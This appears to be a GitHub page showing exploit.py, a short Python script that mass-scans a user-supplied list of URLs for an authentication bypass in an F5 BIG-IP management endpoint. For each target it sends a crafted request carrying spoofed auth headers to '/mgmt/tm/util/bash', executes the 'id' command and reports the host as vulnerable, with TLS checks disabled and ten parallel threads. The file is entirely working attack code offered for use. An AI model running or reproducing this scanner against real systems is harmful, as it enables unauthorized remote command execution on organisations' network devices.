-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
38 lines (31 loc) · 1.09 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from concurrent.futures import ThreadPoolExecutor
user_inp = input("Enter LIst: ")
files = open(user_inp, 'r').readlines()
files = [s.rstrip() for s in files]
def exploit(url):
check_url = url+'/mgmt/tm/util/bash'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
'Content-Length': '45',
'Connection': 'Keep-Alive, X-F5-Auth-Token',
'Authorization': 'Basic YWRtaW46QVNhc1M='
}
data = '''
{
"command":"run",
"utilCmdArgs":"-c id"
}
'''
try:
response = requests.post(check_url, data=data, headers=headers, verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
print(url+" is vuln")
else:
pass
except Exception as e:
print(e)
with ThreadPoolExecutor(10) as th:
th.map(exploit, files)